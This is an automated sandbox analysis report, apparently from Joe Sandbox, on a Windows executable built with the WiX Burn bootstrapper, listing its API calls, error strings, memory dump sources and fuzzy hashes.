                                                                                                                                                                                                                                                                              • Part of subcall function 0090469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,help,000000FF), ref: 009047BB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E688C
                                                                                                                                                                                                                                                                            • Fatal error while parsing command line., xrefs: 008E6824
                                                                                                                                                                                                                                                                            • Failed to initialize internal cache functionality., xrefs: 008E687A
                                                                                                                                                                                                                                                                            • Failed to initialize engine section., xrefs: 008E684D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString$CriticalInitializeSection$Process$CloseCurrentErrorHandleLastOpenToken
                                                                                                                                                                                                                                                                            • String ID: Failed to initialize engine section.$Failed to initialize internal cache functionality.$Fatal error while parsing command line.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 268551788-2320754317
                                                                                                                                                                                                                                                                            • Opcode ID: f33b9627ff7400dbab281e73d04b2136f2fdf9be16a7c4e25bc5e11f73f0db6a
                                                                                                                                                                                                                                                                            • Instruction ID: 33e5cb30fbbc4781350c078d921d265a50db8e6ec3b769e226074f12d6a52d4d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f33b9627ff7400dbab281e73d04b2136f2fdf9be16a7c4e25bc5e11f73f0db6a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA314175941215BBDF11DFA5CC89FDA3BACFF49750F040276BE18EB185E6B0A5048BA0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,00000000,00000000,?,00000000,?), ref: 00902BF1
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00902C80
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateFileHandle
                                                                                                                                                                                                                                                                            • String ID: -%ls=%Iu$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self$d:\a\wix4\wix4\src\burn\engine\core.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 3498533004-1973934485
                                                                                                                                                                                                                                                                            • Opcode ID: 486ae2b4844041469ebd2f0f4173f186ef8719114c8f9eec77aa5156c76ba343
                                                                                                                                                                                                                                                                            • Instruction ID: bf7714e5d486933cb73e06f8267d3d419da54283eee7cf8be68ed3872c8779f9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 486ae2b4844041469ebd2f0f4173f186ef8719114c8f9eec77aa5156c76ba343
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B11D331A80324BAE721AF5A8C0EF9F3E6CAB82B75F100341FD64B61D1E2B006558792
APIs
• CoInitialize.OLE32(00000000), ref: 0094059B
• CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,0097D6D8,?,00000000,008E7C5D,?,?,?,?,?,?), ref: 009405EA
• CLSIDFromProgID.OLE32(MSXML.DOMDocument,0097D6D8,?,?,?,?,?,?), ref: 009405FA
Strings
• MSXML.DOMDocument, xrefs: 009405F5
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 009405BB
• failed to initialize COM, xrefs: 009405AF
• failed to get CLSID for XML DOM, xrefs: 00940606
• Msxml2.DOMDocument, xrefs: 009405E5
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: FromProg$Initialize
• String ID: MSXML.DOMDocument$Msxml2.DOMDocument$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed to get CLSID for XML DOM$failed to initialize COM
• API String ID: 4047641309-3267221515
• Opcode ID: eba20f0d3a0f6dc82723e8b7398c2ae6431c55f3cff7f3487d92511c11c5c524
• Instruction ID: 093f7914538f31119dd3bead065a44a87033a2ec5ff51a4ca8712483dc8da115
• Opcode Fuzzy Hash: eba20f0d3a0f6dc82723e8b7398c2ae6431c55f3cff7f3487d92511c11c5c524
• Instruction Fuzzy Hash: 6201AC72BD573037D7311A565C0EF571958EBE1B65F024111BB0DF7180E5B0498096D1
APIs
• GetLastError.KERNEL32(?,00000000,?,00000000,00000001,00000000), ref: 00943C09
• GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,?,00000000,00000001,00000000), ref: 00943C54
• GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 00943C98
• GetLastError.KERNEL32(?,0094F890,?,00000000,?,00000000,00000000,00000000), ref: 00943CF6
• GlobalFree.KERNEL32(?), ref: 00943D48
Strings
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: ErrorLast$Global$AllocFree
• String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp$failed to allocate version info for file: %ls$failed to get version info for file: %ls$failed to get version value for file: %ls
• API String ID: 1145190524-120110023
• Opcode ID: dc394e36d5a7b69e4e9b43dc53429ee3aa44e5d36cf5128f7ab2bdd5ad155fc3
• Instruction ID: acbcb377ce9c0bcd1e4d114522142f1ec2ca891803576f690a7710b42c819bc5
• Opcode Fuzzy Hash: dc394e36d5a7b69e4e9b43dc53429ee3aa44e5d36cf5128f7ab2bdd5ad155fc3
• Instruction Fuzzy Hash: 04411672E40324BBD72196658C46FAF7A6CEF85B50F018115BE44FB2C1E770CE0096E1
APIs
• CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,00000000,000000FF,00000000,00000005,00000000,00000000,00000005,00000000,00000000,00000000,0000001C), ref: 00941F49
• GetLastError.KERNEL32(?,?,?,008FF669,?,0000001C,00000000,0000001C,?,00000000,WiX\Burn,PackageCache,00000000,0000001C,00000018,00000000), ref: 00941F53
Strings
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: CompareErrorLastString
• String ID: Both paths are required.$Failed to canonicalize wzPath1.$Failed to canonicalize wzPath2.$Failed to compare canonicalized paths.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
• API String ID: 1733990998-2188151180
• Opcode ID: cf5378bb64c1b092f088baaacd0b2287b1f74a186b42c0a291c4b0c98de3c442
• Instruction ID: bb12ca7baf417984fcba68b77e9be61ecf5e13c775aaa96e82e369e93cfb719a
• Opcode Fuzzy Hash: cf5378bb64c1b092f088baaacd0b2287b1f74a186b42c0a291c4b0c98de3c442
• Instruction Fuzzy Hash: 8E318F72940328FBDB215695CC4AFBFB96CEF41BA4F118295F904BB1D1E3708D81E6A0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(00000001,?,00000001,00000000,?,008FED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000), ref: 008E6313
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008FED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000,00000000,?,00000021,00000000), ref: 008E6321
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                                            • String ID: cannot find parent path$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp$failed to create path: %ls
                                                                                                                                                                                                                                                                            • API String ID: 1375471231-3388094611
                                                                                                                                                                                                                                                                            • Opcode ID: 5abad9774f12891cf378089c4202e7a0d84fc9d1066838202deb735b68907bce
                                                                                                                                                                                                                                                                            • Instruction ID: 009f6e295b0b50cfd4404c238298700bdc611b24f629075c5de419583b95b029
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5abad9774f12891cf378089c4202e7a0d84fc9d1066838202deb735b68907bce
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7210926A442B4A3EB315A574C46F3F6A58FB63BE4F110115FD04EB2C0F2B18C2192D6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: %ls%ls$Failed to create the fully-qualified path to %ls.$Failed to get the Windows system directory.$Failed to load the library %ls.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-242608188
                                                                                                                                                                                                                                                                            • Opcode ID: 0e58856585b092df1fdeb2da56600287cf0bddef8842a2a71b37a03acc2409bd
                                                                                                                                                                                                                                                                            • Instruction ID: bc8768332da5bfb7f10929f4628129d7ec41ebb71ae9cd668da1f30d8836ac65
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e58856585b092df1fdeb2da56600287cf0bddef8842a2a71b37a03acc2409bd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B21E775E40365B7DF21AB968C0EFAE7EA8FF46B14F404055FA04FA2C1E6B19E00D691
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(008E7D5B), ref: 00940651
                                                                                                                                                                                                                                                                              • Part of subcall function 0093FE01: GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,008E7DDB,?,00940662,00000000,008E7D5B,00000000,?,?,009040B9,?,?,008E7D5B,?), ref: 0093FE1F
                                                                                                                                                                                                                                                                              • Part of subcall function 0093FE01: GetLastError.KERNEL32(?,00940662,00000000,008E7D5B,00000000,?,?,009040B9,?,?,008E7D5B,?,?,?,?,?), ref: 0093FE2B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • failed put_validateOnParse, xrefs: 009406B5
                                                                                                                                                                                                                                                                            • failed loadXML, xrefs: 00940761
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 00940683, 009406C4
                                                                                                                                                                                                                                                                            • failed put_resolveExternals, xrefs: 009406F1
                                                                                                                                                                                                                                                                            • failed XmlCreateDocument, xrefs: 00940674
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorHandleInitLastModuleVariant
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlCreateDocument$failed loadXML$failed put_resolveExternals$failed put_validateOnParse
                                                                                                                                                                                                                                                                            • API String ID: 52713655-3681987369
                                                                                                                                                                                                                                                                            • Opcode ID: 1ba1ba09ebd56a805ab35b68b6c2cb0c9a07cda6968e54d5bf7587f9a783a34a
                                                                                                                                                                                                                                                                            • Instruction ID: dc1a4b9c74e713e296ce752dd6543078581977e54e82b2264b4abd28509f0a22
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ba1ba09ebd56a805ab35b68b6c2cb0c9a07cda6968e54d5bf7587f9a783a34a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D41B576B40318ABDB05DFA8CC45EDE77B9FF89710F114069F605FB290EA70A9018B95
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,009462A5,00000000,00000000,80000002,00000000,00020019,?,00020019,00000000,00000000,00000000), ref: 00945FBC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to re-allocate more space for expanded path., xrefs: 00946027
                                                                                                                                                                                                                                                                            • Failed to allocate space for expanded path., xrefs: 00945F98
                                                                                                                                                                                                                                                                            • Failed to get max length of input buffer., xrefs: 00945F5F
                                                                                                                                                                                                                                                                            • Failed to expand environment variables in string: %ls, xrefs: 00946052
                                                                                                                                                                                                                                                                            • Failed to get max length of written input buffer., xrefs: 00946016
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\env2util.cpp, xrefs: 00945F6B, 00946044, 00946049, 0094605E
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate space for expanded path.$Failed to expand environment variables in string: %ls$Failed to get max length of input buffer.$Failed to get max length of written input buffer.$Failed to re-allocate more space for expanded path.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\env2util.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1452528299-33012345
                                                                                                                                                                                                                                                                            • Opcode ID: 383ac039d48e9a381fa22509adbf0cf8d119ad48b241de9b1325c9d3088d313d
                                                                                                                                                                                                                                                                            • Instruction ID: 5d8cf01ace77d95b84c2a969aac4c8fad4c7ab53b65a1f10128579676543f2df
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 383ac039d48e9a381fa22509adbf0cf8d119ad48b241de9b1325c9d3088d313d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E31EC73B40A25B7EB315A9A8C4AF6F7E5CEB42B50F120551FE04FF1C2E6749D009692
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Failed to concatenate string to pre-init buffer$Failed to get length of raw string$Failed to write output to log: %ls - %hs$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-492501437
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000003,00000000,00000000,?,?,?,0093CDF4), ref: 0093D224
                                                                                                                                                                                                                                                                              • Part of subcall function 008E55C9: GetProcessHeap.KERNEL32(00000000,?,?,?,0090DE2B,?), ref: 008E55D3
                                                                                                                                                                                                                                                                              • Part of subcall function 008E55C9: RtlFreeHeap.NTDLL(00000000,?,?,0090DE2B,?), ref: 008E55DA
                                                                                                                                                                                                                                                                              • Part of subcall function 008E55C9: GetLastError.KERNEL32(?,?,0090DE2B,?), ref: 008E55E4
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$ErrorFreeLastProcesslstrlen
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate buffer for raw registry value.$Failed to expand registry value: %ls$Failed to get size of raw registry value.$Failed to read raw registry value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1805815496-598890354
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?), ref: 00942BBF
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                                            • String ID: Failed to read from source.$Failed to write to target.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2738559852-3357669501
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 0090E158
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 0090E162
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                            • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2976181284-2861879377
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to combine logging path with root path., xrefs: 009465CE
                                                                                                                                                                                                                                                                            • SOFTWARE\Policies\, xrefs: 009465BE
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 009465DD, 00946635
                                                                                                                                                                                                                                                                            • Failed to open policy registry key., xrefs: 00946626
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Failed to combine logging path with root path.$Failed to open policy registry key.$SOFTWARE\Policies\$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-3658365009
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E174A: WaitForSingleObject.KERNEL32(?,0090EA2A,00000000,?,0090EA2A,?,000000FF), ref: 008E1756
                                                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE(0094E7E8,00000000), ref: 0093BF6C
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008E768F,?,000000FF,?,?,?,00000001), ref: 0093BF76
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CodeErrorExitLastObjectProcessSingleWait
                                                                                                                                                                                                                                                                            • String ID: Failed to get process return code.$Failed to wait for process to complete.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1402617016-1146304469
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • UuidCreate.RPCRT4(?), ref: 00945CDB
                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,00000000,00000027), ref: 00945D02
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateFromStringUuid
                                                                                                                                                                                                                                                                            • String ID: Failed to convert guid into string.$UuidCreate failed.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\guidutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 4041566446-2208176607
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000), ref: 008E1136
                                                                                                                                                                                                                                                                              • Part of subcall function 008E79D1: lstrlenW.KERNEL32(burn.clean.room,?,?,?,008E1144,?,?,00000000), ref: 008E79EF
                                                                                                                                                                                                                                                                              • Part of subcall function 008E79D1: CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,008E1144,?,?,00000000), ref: 008E7A1F
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1651: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,008E114D), ref: 008E1658
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?), ref: 008E1191
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to run application., xrefs: 008E116F
                                                                                                                                                                                                                                                                            • D:\a\wix4\wix4\src\burn\stub\stub.cpp, xrefs: 008E117E
                                                                                                                                                                                                                                                                            • .Wu@1Wu, xrefs: 008E1191
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCompareCreateFileHandleHeapInformationStringlstrlen
                                                                                                                                                                                                                                                                            • String ID: D:\a\wix4\wix4\src\burn\stub\stub.cpp$Failed to run application.$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 4127744429-2265392950
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to run RunOnce mode., xrefs: 008E7DDE
                                                                                                                                                                                                                                                                            • Failed to run per-machine mode., xrefs: 008E7E48
                                                                                                                                                                                                                                                                            • Invalid run mode., xrefs: 008E7DA3
                                                                                                                                                                                                                                                                            • Failed to run embedded mode., xrefs: 008E7E12
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Invalid run mode.
                                                                                                                                                                                                                                                                            • API String ID: 0-2744884814
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,008E6570,00000000,?,?,?,?,?), ref: 008E7BB5
                                                                                                                                                                                                                                                                              • Part of subcall function 0090D137: CloseHandle.KERNEL32(00000000,?,00000001,?,?), ref: 0090D2CD
                                                                                                                                                                                                                                                                              • Part of subcall function 0090D137: CloseHandle.KERNEL32(00000000,?), ref: 0090D2E2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7B31
                                                                                                                                                                                                                                                                            • Failed to initialize COM., xrefs: 008E7BC1
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$Initialize
                                                                                                                                                                                                                                                                            • String ID: Failed to initialize COM.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 4100669059-4079876660
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000006,00000006,00000070,00000000,00000000,00000000,00000000,00000000,?,?,008FC9FA,WiX\Burn,EngineWorkingDirectory,00000000), ref: 009468C4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 00946845, 009468A5
                                                                                                                                                                                                                                                                            • Failed to open policy key: %ls, name: %ls, xrefs: 00946896
                                                                                                                                                                                                                                                                            • Failed to open policy key: %ls, xrefs: 00946839
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to open policy key: %ls$Failed to open policy key: %ls, name: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-3938230626
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,0000001C,?,?,008FF5CE,WiX\Burn,PackageCache,00000000,0000001C), ref: 009467D9
                                                                                                                                                                                                                                                                            Strings
